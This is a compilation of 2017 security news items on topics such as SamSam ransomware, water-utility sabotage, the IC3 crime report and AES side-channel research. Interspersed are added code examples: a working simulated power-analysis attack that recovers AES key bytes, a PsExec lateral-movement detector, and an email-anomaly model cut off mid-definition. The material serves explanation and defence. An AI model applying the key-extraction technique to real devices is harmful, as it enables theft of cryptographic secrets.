The relationship between the ZKB amendment, which can be expected to take effect at the end of summer or early autumn, and the European GDPR regulation, which will apply from 25 May 2018, is double-edged. On the one hand, they agree mainly in two areas, namely: 1) the need to be able to detect and correctly evaluate the most varied types of cyber attacks, threats and risks in time, and to be able to react to these risks quickly and effectively (the obligation to report incidents promptly); 2) the need to devote more attention and resources to cyber and information security.

Large differences are then perceived between the purpose and content of the two pieces of legislation; particularly worth noting are the aim of protection and the approach to selecting security measures.

The ZKB aims above all to protect the functionality and availability of essential services, for example so that drinking water is available, electricity works, transport runs, state bodies and banks function, and so on.

The aim of GDPR is then primarily the protection of the privacy and rights of natural persons with regard to the processing of their personal data, so that nobody steals, publishes, alters or deletes their personal data.

In its approach to selecting security measures, the amendment to the Cyber Security Act is clearer, as it precisely sets out a specific list of security measures that every company covered by the ZKB must adopt.

These include, for example, protecting network access, ensuring secure login for its users, the use of encryption technologies, regular monitoring, and so on. Under the European GDPR regulation, the approach is based on an individual risk assessment.

This means that it is up to each data controller to assess for itself how much personal data it processes, what value this data has not only for it but also for potential attackers, how extensive the systems in which it processes the data are, how many users have access to these systems, and how vulnerable the individual systems are.

Based on this initial analysis, each controller evaluates its specific risks and adopts adequate security measures (e.g. data encryption, anonymization, monitoring, etc.).


Company fired an employee, he shut down water utility providers’ networks in 5 cities
26.6.2017 securityaffairs Cyber

A former employee was sentenced to one year and one day in prison for damaging the IT networks of several water utility providers across the US East Coast.
Adam Flanagan (42) of Bala Cynwyd, PA was sentenced to one year and one day in prison by a Pennsylvania court for damaging the IT networks of several water utility providers across the US East Coast.

The news was reported by Bleeping Computer; the man worked between November 2007 and November 2013 as an engineer for an unnamed company that manufactured smart water, electric, and gas readers.

Among Flanagan's tasks was the setup of Tower Gateway Basestations (TGB) for customers, which were mainly water utility networks.
The Tower Gateway Basestations are essential components of water facility networks composed of smart meters installed at people's homes that exchange data with the water facility operators' systems.
These networks allow water facility operators to collect consumption data and check the status of the installations at customers' homes.

On November 16, 2013, the company fired Flanagan for undisclosed reasons; the man then decided to punish the company by shutting down TGB stations, paralyzing the water facility networks of the company's customers. Flanagan also changed the passwords on some TGBs to offensive words.

The utility providers had to send employees out to customer homes to collect the monthly consumption readings.

“According to court documents, the FBI tracked down Flanagan’s actions to six incidents in five cities across the US East Coast: Aliquippa (Pennsylvania), Egg Harbor (New Jersey), Kennebec (Maine), New Kensington (Pennsylvania), and Spotswood (New Jersey),” reported Catalin Cimpanu from Bleeping Computer.


The investigators identified the former employee as the person responsible for the incidents, and US authorities filed charges on November 22, 2016.

Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017, and on June 14, 2017, he was sentenced to one year in jail; let me say that the judges were clement.


Reading the 2016 Internet Crime Complaint Center (IC3) report
26.6.2017 securityaffairs Crime

According to the 2016 Internet Crime Complaint Center (IC3) report, 298,728 complaints were received in 2016, totaling more than $1.3 billion in financial loss.
According to the new edition of the Internet Crime Complaint Center (IC3) report, 298,728 complaints were received in 2016 totaling more than $1.3 billion in financial loss.

The FBI's annual Internet Crime Complaint Center (IC3) report was released on Thursday; it provides figures about the most prevalent forms of cyber crime today.

Online extortion, tech support scams and Business Email Compromise (BEC) scams continue to be the most costly criminal activities reported by consumers and businesses. The figures in the Internet Crime Complaint Center (IC3) report relate to 2016.
Business Email Compromise (BEC) and individual Email Account Compromise (EAC) scams accounted for more than 25% of the total financial loss (around $360.5 million) even though they represented only a very small proportion of the Internet crime reported in 2016 (12,005 incidents). This confirms that both BEC and EAC are profitable activities for crooks.

BEC scams are evolving, and the report notes requests for PII and Wage and Tax Statement (W-2) forms for employees.

“BECs may not always be associated with a request for transfer of funds. In 2016, the scam evolved to include the compromise of legitimate business email accounts and requests for Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” states the report.

The three online crimes that were most commonly reported to IC3 in 2016 were non-payment and non-delivery incidents (81,029 incidents), personal data breaches (27,573), and 419/overpayment scams (25,716).



The IC3 received 17,146 extortion-related complaints that account for over $15 million in financial loss. A closer look at the extortion-related complaints revealed that 2,673 were ransomware-based attacks, which accounted for $2.4 million in losses.
This data could be just the tip of the iceberg considering that the majority of the victims don’t report the crime to law enforcement.

The Internet Crime Complaint Center (IC3) report highlights that only 15 percent of the US victims report their crimes to the authorities. For 2016, 298,728 complaints were received, with a total victim loss of $1.33 billion.

Let me suggest reading the report; it is one of the most interesting documents related to Internet crime and is full of data. I personally believe that this edition of the report is the best one so far: it is well organized, and the data are aggregated in a way that is easy to analyze.


SamSam ransomware attacks increase and crooks demand higher ransom
25.6.2017 securityaffairs Ransomware

Researchers at AlienVault have observed a significant increase in the number of SamSam ransomware attacks; crooks are demanding $33,000 from the victims.
Security experts at AlienVault have observed a new string of attacks leveraging the SamSam ransomware, and this time the crooks are demanding a $33,000 ransom to decrypt the files.

According to the researchers, crooks demand:

1.7 Bitcoin ($4,600) for a single machine
6 Bitcoins ($16,400) for half the machines (allowing the victim to confirm they can recover their files)
12 Bitcoins ($32,800) for all of the machines
The malware is installed on vulnerable systems through manual compromise; once it infects a machine, it is able to spread to other computers on the network.

Experts believe SamSam's operators charge very high ransoms because of the effort they invest in their operations. The FBI issued two alerts on the SamSam threat last year.

“MSIL or Samas (SAMSAM) was used to compromise the networks of multiple U.S. victims, including 2016 attacks on healthcare facilities that were running outdated versions of the JBoss content management application.” states the report published by the FBI. “SAMSAM exploits vulnerable Java-based Web servers. SAMSAM uses open-source tools to identify and compile a list of hosts reporting to the victim’s active directory. The actors then use psexec.exe to distribute the malware to each host on the network and encrypt most of the files on the system. The actors charge varying amounts in Bitcoin to provide the decryption keys to the victim.”

According to the researchers at AlienVault, SamSam attackers are using the following techniques to infect the machines:

Gain remote access through traditional attacks, such as JBoss exploits
Deploy web-shells
Connect to RDP over HTTP tunnels such as ReGeorg
Run batch scripts to deploy the ransomware over machines

SamSam was first spotted more than a year ago; it is written in C#, and once it has infected a machine the threat targets over 300 file types for encryption.

The most recent variants show no changes compared to previous ones; they leverage the functions encc.myff1 and encc.EncryptFile for encryption.

Once the files are encrypted, the SamSam ransomware deletes the originals. Experts noticed that the threat does not wipe the sectors of the removed files, which may allow users to recover their files or parts of them.

Researchers noticed a peak in the number of SamSam attacks; its operators appear very active in this period. In April, systems at a New York hospital were infected with the ransomware, but the administration refused to pay the $44,000 ransom demanded by the crooks.

“SamSam, which targets vulnerabilities in servers to infiltrate computer networks, is responsible for other attacks, including a major ransomware incident last year at 10-hospital Medstar Health in Maryland.” states buffalonews.com.

Experts who analyzed the transactions on the Bitcoin address associated with the SamSam operators noticed that the attackers had received $33,000 from their victims.

“The most recent attacks appear to have been successful, at least from the attacker’s point of view. The Bitcoin address associated with this week’s attacks has received $33,000,” states AlienVault.



Trusting users will be robbed of their money. The virus threat also affects the Czech Republic

25.6.2017 Novinky/Bezpečnost Viry
It is a pretty old trick, but it evidently works. And so cybercriminals try again and again to fool users with extortion viruses. First they lock the computer, supposedly because the user was using illegal software or downloading copyrighted works. They then demand payment of a fine to unlock it. Computer pirates are trying similar tricks in the Czech Republic too.
Extortion viruses have been circulating on the internet for the past several years. Even so, every month more and more people fall for the demand to pay a ransom. It therefore logically pays off for computer pirates to spread these uninvited guests, and so they deploy them ever more often.

The SophosLabs global threat research network monitored the behaviour of various extortion viruses, collectively known as ransomware, for the past several months, specifically from October 2016 to April 2017. The results show that ransomware spreads most often in the United Kingdom.

The Czech Republic ranks lower, but...
Belgium took the unflattering second place, followed by the Netherlands and the United States of America. The uninvited guests do not avoid domestic computers either. With a share of less than one percent, the Czech Republic ranks 66th.

Although the risk of infection is significantly lower in the Czech Republic than in many other European countries, it certainly does not pay to underestimate this threat. Attackers can cause a great deal of mischief on compromised machines.

Attacks by extortion viruses are always exactly the same. First, these intruders encrypt all the data stored on the hard drive. The attackers then demand a ransom to make it accessible again, easily several thousand crowns.

Do not pay the ransom
Cybercriminals usually try to give the owner of the infected machine the impression that they will get their files back after paying the fine.

It should be remembered, however, that people should not pay the ransom, because they have no guarantee that the data will actually be made accessible. Similar cases that have appeared in the past even show that the data is practically never decrypted. The only solution is to disinfect the computer, which may not be easy.

The WannaCry malicious code served as a reminder in recent weeks to stay alert to extortion viruses. In just a few hours it attacked more than 300,000 computers in 150 countries. In the Czech Republic alone, over 600 machines were attacked, which security experts consider a success, as the spread of this ransomware abroad was far more intensive.


UK Parliament Cuts Email Access After Cyberattack

25.6.2017 securityweek BigBrothers
Britain's parliament shut down external access to e-mail accounts on Saturday following a cyberattack.

Parliamentary authorities described the attack as "sustained and determined", in an email sent to lawmakers and published by the Daily Telegraph.

"Earlier this morning we discovered unusual activity and evidence of an attempted cyberattack on our computer network," it read.

"Closer investigation by our team confirmed that hackers were carrying out a sustained and determined attack on all parliamentary user accounts.

"We have been working closely with the National Cyber Security Centre to identify the method of the attack and have made changes to prevent the attackers gaining access."

A House of Commons spokeswoman said that officials had taken "the necessary steps to protect our systems."

"Parliament has disabled remote access to protect the network," she said.

The threat follows reports in British media, including the Times, that hackers were selling passwords for MPs online.

The National Crime Agency said it was "aware of a possible cyber incident affecting parliament".

International Trade Minister Liam Fox told ITV News it was a "warning to everyone we need more security and better passwords".

Fox told the BBC: "We know that our public services are attacked so it is not at all surprising that there should be an attempt to hack into parliamentary emails".

A global ransomware attack last month hit hundreds of thousands of computers, including hospitals in Britain that were forced to shut down, divert emergency cases and postpone operations.

The so-called WannaCry ransomware locked access to user files and in an on-screen message demanded payment of $300 (275 euros) in the virtual currency Bitcoin in order to decrypt the files.


The CIA was aware of Putin’s order to support the Trump Presidential campaign candidacy
25.6.2017 securityaffairs BigBrothers
The CIA was aware since August that President Putin personally ordered an operation to support Donald Trump presidential race.
The intelligence shocked the White House and put US security chiefs on a top-secret crisis footing to figure out how to react.

According to the Washington Post, CIA was aware since August that President Putin personally ordered an operation to support Donald Trump in the 2016 Presidential Election.

According to the media outlet, confidence that Democrat Hillary Clinton had the election won led the Obama administration to avoid taking countermeasures.

After the shocking victory of Donald Trump, the US intelligence community had great regrets over the missed action.

“From national security people there was a sense of immediate introspection, of, ‘Wow, did we mishandle this,'” a former administration official told the newspaper.

The Washington Post reports that a secret intelligence task force was created by the US to firm up the information and respond to the Russian threat. The experts' work focused on preventing the hacking of voting systems, which would undermine confidence in the vote tally itself.

The Obama administration opted to deliver a warning to the Russian government instead of hacking back.


According to the Post, the US sent at least four direct warnings to the Russians through different channels, including direct messages from Obama to Putin. The messages discouraged the Russian Government from hacking the US voting operations.

“We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures,” a senior administration official told the Post.

Punitive measures ranged from sanctions to launching cyberattacks on Russian infrastructure; in December, an executive order issued by President Obama applied sanctions to Russian military and intelligence officials, and 35 Russian operatives were expelled.

The Post reports that Obama authorized a plan to implant malware in the systems of critical Russian infrastructure, but it is unclear if Trump has followed through with that.

Donald J. Trump (@realDonaldTrump), 24 Jun 2017: "Just out: The Obama Administration knew far in advance of November 8th about election meddling by Russia. Did nothing about it. WHY?"
Trump criticized the response of the Obama administration to the alleged Russian threat.

“If he had the information, why didn’t he do something about it? He should have done something about it. But you don’t read that. It’s quite sad.” said Trump in an interview at a Fox News program.


The British Parliament was the target of a cyber attack

24.6.2017 Novinky/Bezpečnost BigBrother
The British Parliament has been the target of a cyber attack. Someone attempted to break into personal accounts, a source from the House of Commons told the BBC on Saturday. As a result of efforts to resolve the problem, lawmakers lost remote access to their e-mail, the Reuters agency reported.
The Telegraph wrote that lawmakers were alerted to the hacker attack as early as Friday and still do not have access to their e-mail accounts.

A spokeswoman for the House of Commons confirmed to the BBC that Parliament had detected "unauthorised attempts to access parliamentary user accounts" and that the interruption of e-mail access is a consequence of efforts to resolve the problem.

"We continue to investigate this incident and are taking further measures to secure the computer network in cooperation with the National Cyber Security Centre," the spokeswoman said. According to her, the aim is to protect the accounts of both lawmakers and parliamentary staff.

In May, a cyber attack crippled British hospitals belonging to the National Health Service (NHS).


Two young men attacked Microsoft. It did not end well

24.6.2017 Novinky/Bezpečnost Kriminalita
Two young hackers from England tried to attack the servers of the American company Microsoft with a single goal: to steal sensitive customer data of the software giant. Their efforts were unsuccessful, however, and worse, both ended up in the hands of the police. The Hacker News site reported this.
The whole case was handled by detectives from the British organised crime unit (SECORU). They arrested the young men on Thursday but have not yet disclosed their identities.

They have, however, already charged them with the offence of "unauthorised access". Similar hacking activities, in which computer pirates try to break into the servers of organisations, are criminal in England. Police have confirmed that the young men, aged 22 and 25, attacked Microsoft's servers.

"We are still at the beginning of the investigation. Nevertheless, we will work hard with our partners to ensure that cybercriminals have nowhere to hide," said Detective Rob Bryant, who works in the SECORU unit, in connection with the case.

They did not get to customer data
According to him, the English police are cooperating on the case with Europol, the FBI and a number of other foreign security agencies. Among them is also a team of security experts directly from Microsoft.

The young men's attacks are said to have taken place between January and March of this year. "In the end, however, the young men did not gain access to Microsoft customer data, which we can already confirm," the detective stated.

The ongoing investigation nevertheless suggests that the young men were part of some transnational group of hackers. "In addition to the two young men, we also seized a whole range of computers and other devices. That should move the case forward significantly," Bryant noted.

The trial of the two young men will begin in several weeks at the earliest.


Stealing AES-256 keys in seconds using €200 of off-the-shelf components
24.6.2017 securityaffairs Hacking

Security experts at Fox‑IT have demonstrated that it is possible to sniff AES-256 encryption keys from a distance of one meter (3.3 feet) with cheap equipment.
Security experts at Fox‑IT have demonstrated that it is possible to mount a side-channel attack that wirelessly extracts secret AES-256 encryption keys from a distance of one meter (3.3 feet).

The researchers used €200 (~US$224) worth of off-the-shelf electronic components to monitor a computer's electromagnetic radiation. The entire process of sniffing the keys over the air took around five minutes, but the experts noticed that by reducing the distance to 30 centimeters (11.8 inches) it is possible to extract the keys in just 50 seconds.

The experts' setup consisted of a simple loop antenna connected to an external amplifier and bandpass filters bought online, plugged into a software-defined radio USB stick for which they paid just €20.

The resulting device was small enough to be hidden in a jacket or laptop case.


“Using improved antenna and signal processing, Fox-IT and Riscure show how to covertly recover the encryption key from two realistic AES-256 implementations while:

Attacking at a distance of up to 1 m (30 cm in realistic conditions; “TEMPEST”)
Using minimal equipment (fits in a jacket pocket, costs less than €200) and
Needing only a few minutes (5 minutes for 1 m and 50 seconds for 30 cm),” reads the research paper.
The system designed by the experts is able to record radio signals generated by the power consumption of the SmartFusion2 target system running an ARM Cortex-M3-powered chip.

By measuring the leakage between the Cortex processor and the AHB bus, the analysis of consumption was then linked to the encryption process in order to extract the keys. The researchers mapped out how the power consumption related to individual bytes of information by running different encryption processes on a test rig.

“We see I/O to and from the Cortex-M3, calculations for the key schedule, and the 14 encryption rounds,” the paper explains beneath an overview trace showing the pattern dependent on the AES algorithm. “So, we can measure a signal which is related to the instantaneous power consumption of part of the chip. This is still a long way from extracting secret keys though! To extract the key, we need to observe many different encryption blocks with different inputs and attempt to model how the device leaks information.”

With this technique, the experts only needed to work through the 256 possible values of a single key byte at a time.

“Using this approach only requires us to spend a few seconds guessing the correct value for each byte in turn (256 options per byte, for 32 bytes – so a total of 8,192 guesses),” states the paper. “In contrast, a direct brute-force attack on AES‑256 would require 2^256 guesses and would not complete before the end of the universe.”
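The byte-by-byte search the paper describes, as an added example (not Fox-IT or Riscure code): a simulated correlation power analysis (CPA) of the first AES round on synthetic traces. The traces assume the textbook leakage model, the Hamming weight of each S-box output plus Gaussian noise; that model, the trace count and the noise level are assumptions for the simulation, not a description of the SmartFusion2 measurements.

```python
"""Added example (not Fox-IT/Riscure code): simulated CPA on the first AES round.
Shows why a leaking implementation lets each key byte be recovered independently
(256 candidates per byte) instead of needing 2**256 guesses. All traces here are
constructed: Hamming weight of the SubBytes output plus Gaussian noise."""
import random

IRREDUCIBLE = 0x11B  # AES field polynomial x^8 + x^4 + x^3 + x + 1


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) with the AES reduction polynomial."""
    product = 0
    while b:
        if b & 1:
            product ^= a
        a <<= 1
        if a & 0x100:
            a ^= IRREDUCIBLE
        b >>= 1
    return product


def build_sbox():
    """Construct the AES S-box: multiplicative inverse, then the affine map."""
    inverse = [0] * 256
    for x in range(1, 256):
        if not inverse[x]:
            y = next(y for y in range(1, 256) if gf_mul(x, y) == 1)
            inverse[x], inverse[y] = y, x
    sbox = []
    for x in range(256):
        v = inverse[x]
        s = v
        for shift in range(1, 5):  # s = v ^ rotl(v,1) ^ ... ^ rotl(v,4) ^ 0x63
            s ^= ((v << shift) | (v >> (8 - shift))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = build_sbox()
HW = [bin(v).count("1") for v in range(256)]  # Hamming-weight lookup table


def simulate_traces(key, n_traces, noise_sd, rng):
    """Constructed leakage model (assumption): for each random plaintext the device
    leaks HW(S[p_i XOR k_i]) for every key byte i, plus noise. Returns
    (plaintexts, traces) with one leakage sample per key byte per trace."""
    plaintexts, traces = [], []
    for _ in range(n_traces):
        pt = [rng.randrange(256) for _ in key]
        plaintexts.append(pt)
        traces.append([HW[SBOX[p ^ k]] + rng.gauss(0, noise_sd)
                       for p, k in zip(pt, key)])
    return plaintexts, traces


def pearson(xs, ys):
    """Pearson correlation coefficient of two equal-length sequences."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs)
    vy = sum((y - my) ** 2 for y in ys)
    return 0.0 if vx == 0 or vy == 0 else cov / (vx * vy) ** 0.5


def recover_key_byte(position, plaintexts, traces):
    """Rank the 256 candidates for one key byte by how well the predicted
    leakage correlates with the observed samples; return (best, |corr|)."""
    samples = [t[position] for t in traces]
    best, best_corr = None, -1.0
    for candidate in range(256):
        predicted = [HW[SBOX[pt[position] ^ candidate]] for pt in plaintexts]
        corr = abs(pearson(predicted, samples))
        if corr > best_corr:
            best, best_corr = candidate, corr
    return best, best_corr


def recover_key(plaintexts, traces):
    """Divide and conquer: every key byte is attacked on its own."""
    return [recover_key_byte(i, plaintexts, traces)[0]
            for i in range(len(traces[0]))]


def guess_counts(key_bytes):
    """(candidates tested byte-wise, candidates for a direct brute force)."""
    return key_bytes * 256, 2 ** (8 * key_bytes)


def run_simulation(seed=1, key_len=16, n_traces=200, noise_sd=1.0):
    """Random key (16 bytes = the first round key of AES-256), synthetic traces,
    then recovery. Returns (secret, recovered) so the two can be compared."""
    rng = random.Random(seed)
    secret = [rng.randrange(256) for _ in range(key_len)]
    pts, trs = simulate_traces(secret, n_traces, noise_sd, rng)
    return secret, recover_key(pts, trs)


if __name__ == "__main__":
    secret, recovered = run_simulation()
    print("key recovered:", recovered == secret)
    print("guesses for a 32-byte key (byte-wise, brute force):", guess_counts(32))
```

With the round-2 key bytes recovered the same way once the first 16 are known, the count for the full 32-byte key is 32 × 256 = 8,192 candidates, the figure the paper gives.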

The experts highlighted that the technique is more efficient in proximity to the target system because the electromagnetic signals drop off rapidly with distance.

The technique could be improved with more expensive equipment.

The tests were conducted in a controlled environment where possible interference was limited compared with a live environment.


SamSam Increases Ransom Demand to $33,000

24.6.2017 securityweek Ransomware
In newly observed attacks, the SamSam ransomware that has been active for more than a year is demanding a whopping $33,000 to decrypt all affected machines in a network.

SamSam isn’t distributed through automated tools such as exploit kits or spam botnets, as most ransomware families are, but is instead installed on vulnerable systems through manual compromise.

Once a single machine in a network has been breached, however, the threat can spread to other computers on the network. The ransomware’s operators are using remote desktop protocol (RDP), web shells and batch scripts to compromise networks and deploy the ransomware on every machine, AlienVault’s Chris Doman notes in a blog post.
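The network-wide deployment described here, and the psexec.exe distribution quoted from the FBI alert in the AlienVault article above, leave a recognisable trace on each target: PsExec installs a temporary service named PSEXESVC, and Windows records every new service in the System log as Event ID 7045. The detector below is an added example (not AlienVault's or the FBI's code) that runs over a constructed JSON export of such records; the hostnames, times, paths and the export format are all invented for the example.

```python
"""Added example: flag PsExec-style ransomware fan-out in Windows System log
records. Not AlienVault or FBI code; the log format and all values are constructed."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

SERVICE_INSTALLED = 7045              # System log: "A service was installed in the system"
PSEXEC_SERVICE_NAMES = {"PSEXESVC"}   # name PsExec gives its temporary remote service
SCRIPT_EXTENSIONS = (".bat", ".cmd")  # a service whose binary is a batch script

# Constructed export, one JSON record per line (hosts, times and paths invented).
SAMPLE_LOG = r"""
{"time": "2017-06-20T01:10:00", "host": "PRINT01", "event_id": 7045, "service_name": "VendorSvc", "image_path": "C:\\Program Files\\Vendor\\svc.exe"}
{"time": "2017-06-20T02:14:05", "host": "FS01", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"}
{"time": "2017-06-20T02:14:06", "host": "FS01", "event_id": 7036, "service_name": "PSEXESVC", "image_path": ""}
{"time": "2017-06-20T02:14:09", "host": "WS-12", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"}
{"time": "2017-06-20T02:14:13", "host": "WS-17", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"}
{"time": "2017-06-20T02:15:40", "host": "WS-17", "event_id": 7045, "service_name": "Updater", "image_path": "C:\\Windows\\Temp\\deploy.bat"}
"""


def parse_events(text):
    """Parse one JSON record per line; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return events


def classify(event):
    """Reasons a single service-install record looks like PsExec-style
    deployment; an empty list means nothing suspicious on its own."""
    if event["event_id"] != SERVICE_INSTALLED:
        return []
    reasons = []
    if event["service_name"].upper() in PSEXEC_SERVICE_NAMES:
        reasons.append("psexec remote service installed")
    if event["image_path"].lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("service binary is a batch script")
    return reasons


def find_fanout(events, min_hosts=3, window=timedelta(minutes=10)):
    """The lateral-movement signature: the same service installed on at least
    min_hosts distinct hosts inside one time window. Returns (name, hosts)."""
    by_service = defaultdict(list)
    for e in events:
        if e["event_id"] == SERVICE_INSTALLED:
            by_service[e["service_name"]].append(e)
    hits = []
    for name, installs in by_service.items():
        installs.sort(key=lambda e: e["time"])
        for i, first in enumerate(installs):
            hosts = {e["host"] for e in installs[i:]
                     if e["time"] - first["time"] <= window}
            if len(hosts) >= min_hosts:
                hits.append((name, sorted(hosts)))
                break
    return hits


def detect(text):
    """Run both checks over an export; returns per-record flags and fan-out hits."""
    events = parse_events(text)
    flagged = [(e["host"], e["service_name"], reasons)
               for e in events for reasons in [classify(e)] if reasons]
    return {"flagged": flagged, "fanout": find_fanout(events)}


if __name__ == "__main__":
    result = detect(SAMPLE_LOG)
    for host, name, reasons in result["flagged"]:
        print(f"{host}: {name}: {', '.join(reasons)}")
    for name, hosts in result["fanout"]:
        print(f"fan-out: {name} installed on {len(hosts)} hosts: {hosts}")
```

The fan-out check is the one that separates an administrator's single PsExec session from a deployment to every machine; tune `min_hosts` and `window` to the environment's normal service-install rate.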

Written in C#, the malware’s recent variants show no changes compared to previous samples, researchers say. On the compromised machines, the threat is targeting over 300 file types to encrypt, and uses the functions encc.myff1 and encc.EncryptFile for encryption, a researcher going by the name of Vallejo explains.

Recent SamSam attacks follow the same pattern as previous campaigns, albeit the demanded ransom is higher than before. The malware’s operators demand 1.7 Bitcoin (over $4,500) to decrypt a single machine, 6 Bitcoin (over $16,000) to decrypt data on half the machines, and 12 Bitcoins (around $33,000) to restore data on all of the infected machines.

“In addition, the group behind SamSam charges very high ransoms because of the amount of effort invested in their operations, which made them the subject of two FBI Alerts last year,” the researcher says.

According to AlienVault, the attacks appear to peak in waves, revealing when the ransomware’s authors are active. One notable recent SamSam incident involved a New York hospital that refused to pay the $44,000 ransom demanded after being infected with the ransomware in April.

“The most recent attacks appear to have been successful, at least from the attacker’s point of view. The Bitcoin address associated with this week’s attacks has received $33,000,” Doman reports.

After encrypting a file, SamSam deletes the original and leaves the encrypted variant instead. However, because the malware doesn’t appear to be cleaning the removed file sectors, affected users might be able to recover their files or parts of them.


32TB of Secret Windows 10 Internal Builds & Partial Source Code Leaked Online
24.6.2017 thehackernews OS
A massive archive of Microsoft's top-secret Windows 10 builds, along with source code for private software, has reportedly been leaked online, which could lead to a nasty wave of Windows 10 exploits, a journalist at The Register claims.
The leaked files – uploaded to the BetaArchive website – contain more than 32 terabytes of data, which includes many non-public Windows 10 and Windows Server 2016 builds created by Microsoft engineers for testing purposes.
Interestingly, the Windows 10 internal builds include private debugging symbols defined by the engineers, usually to help other in-house developers understand how specific code in the operating system works and what functions it calls, the Register reports.

Private debugging symbols reveal some sensitive in-depth knowledge about the operating system that could be used by exploit writers to find vulnerabilities.
Moreover, the dump also contains Microsoft's Shared Source Kit, which includes source code for Windows 10 hardware drivers, such as:
Plug-and-Play system
USB Stacks
Wi-Fi Stacks
Storage Drivers
ARM-specific OneCore kernel code
According to Microsoft's website, Shared Source Kit is available only for "qualified customers, enterprises, governments, and partners for debugging and reference purposes."
However, BetaArchive has now removed the confidential ‘Shared Source Kit’ from its servers.
“We have removed it from our FTP and listings pending further review just in case we missed something in our initial release. We currently have no plans to restore it until a full review of its contents is carried out, and it is deemed acceptable under our rules.” BetaArchive said.

The leaked files also contain Microsoft's Windows 10 Mobile Adaptation Kit, a private software toolkit created by Microsoft designed to run Windows 10 operating system on mobile devices.
So far, it’s unclear who is behind this massive leak, but it could be from one of the Microsoft OEM partners.
Stay tuned for more information.


CIA Knew in August that Putin Sought to Boost Trump: Report

24.6.2017 thehackernews BigBrothers
The CIA had top-level intelligence last August that Russian President Vladimir Putin personally ordered an operation to help Donald Trump win the US presidential race, the Washington Post reported Friday.

The intelligence shocked the White House and put US security chiefs on a top-secret crisis footing to figure out how to react.

But amid confidence that Democrat Hillary Clinton still had the election in the bag and worries over president Barack Obama himself being seen as manipulating the election, the administration delivered warnings to Moscow but left countermeasures until after the vote, the Post reported.

After Trump's shock victory, there were strong regrets among administration officials that they had shied from tough action.

"From national security people there was a sense of immediate introspection, of, 'Wow, did we mishandle this,'" a former administration official told the newspaper.

The Post said that as soon as the intelligence on Putin came in, the White House viewed it as a deep national security threat. A secret intelligence task force was created to firm up the information and come up with possible responses.

They couldn't do anything about embarrassing WikiLeaks revelations from hacked Clinton emails. The focus turned to whether Moscow could disrupt the November 8 vote itself by hacking voter registration lists or voting machines, undermining confidence in the vote tally itself.

Worried about making the situation worse, the administration put off retaliating, and instead delivered stiff warnings directly to the Russians not to go farther.

At least four direct warnings -- Obama to Putin, spy chief to spy chief, and via top diplomatic channels -- appeared to have an impact, officials told the Post. They believe that Moscow pulled back on any possible plans to sabotage US voting operations.

"We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures," a senior administration official told the Post.

Options to retaliate were on the table early: more crippling sanctions on the Russian economy, leaking information that would embarrass Putin diplomatically, and launching cyberattacks on Russian infrastructure were high on the list.

But Trump's shock victory dampened the response.

Obama took modest measures at the end of December, expelling 35 Russians and adding to existing sanctions. He also, according to the Post, authorized a plan to place cyberattack implants in the systems of critical Russian infrastructure.

But it remains unclear, the Post said, whether Trump has followed through with that.

Trump on Friday questioned Obama's response to the Russian hacking crisis.

"Just out: The Obama Administration knew far in advance of November 8th about election meddling by Russia. Did nothing about it. WHY?" he posted on Twitter.

In an interview with Fox News program "Fox and Friends" that will air Sunday, Trump groused that Obama's response did not get more media coverage.

"The CIA gave him information on Russia a long time before they even -- before the election. And I hardly see it. It's an amazing thing," Trump said in an excerpt released by the program Friday evening.

"If he had the information, why didn't he do something about it? He should have done something about it. But you don't read that. It's quite sad."


GreatHorn Secures $6.3 Million to Combat Spear-Phishing Attacks

23.6.2017 securityweek  Phishing
Belmont, Mass-based start-up GreatHorn announced Wednesday completion of a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures.

The firm, one of Gartner's 'cool cloud vendors', is bringing machine-learning technology to the continuing threat and problem of targeted spear phishing. Spear-phishing, and the related Business E-mail Compromise (BEC) scam, are two of today's most pernicious threats -- the former is the first stage of the majority of successful breaches; and the latter, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."

Both threats have proved resilient against traditional defenses because of their use of finely tuned and targeted, narrow-band social engineering. Effectively, each threat is new and unique, probably contains no payload to analyze, and is delivered before it can be recognized and blocked. The same problem exists for malware: new versions are delivered and get through signature-based anti-virus defenses before detection is added to the defense.

The solution against malware has been a shift of emphasis towards the recognition of malware behavior, using machine-learning to understand and detect that behavior. Conceptually, GreatHorn takes a similar approach to spear-phishing and BEC. It monitors email across the cloud both in metadata and content. It builds a behavioral graph that can detect anomalies in email behavior.

"We're not looking for a single smoking gun, we do not rely on any single indicator," CEO Kevin O'Brien told SecurityWeek. "What we do is plug into cloud email systems like Google and O365, and we look at all of the mail that gets sent and received. Then we build a social graph -- we start to understand how, for example, a CFO receives messages from the CEO, what those messages look like, how often they come, are they a bi-directional flow or received only. And we look at all the mechanisms of authentication buried in the metadata. We develop a fingerprint that can be coupled with the social graph.

"When you start to do that, not just for a single company but globally for hundreds of thousands of mailboxes every minute you start to see patterns of how email communication works. From there we think of it in terms of anomaly detection, and we can begin to identify anomalous messages -- things that could be spear-phishing or BEC attempts. We're not looking for things that might match an out of date blacklist, we have a unique lens on how individuals inside of a company, or inside of an industry sector, or even around the world, send mail."
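The social-graph approach O'Brien describes can be illustrated with a small model: learn who writes to whom and under which display name, then score each new message by how far it departs from that history. The code below is an added example written for this page, not GreatHorn's product or algorithm; the addresses, baseline traffic, weights and alert threshold are constructed.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Msg:
    sender: str    # header From address
    display: str   # header From display name
    rcpt: str      # recipient address
    auth_ok: bool  # True when SPF/DKIM/DMARC all passed per Authentication-Results


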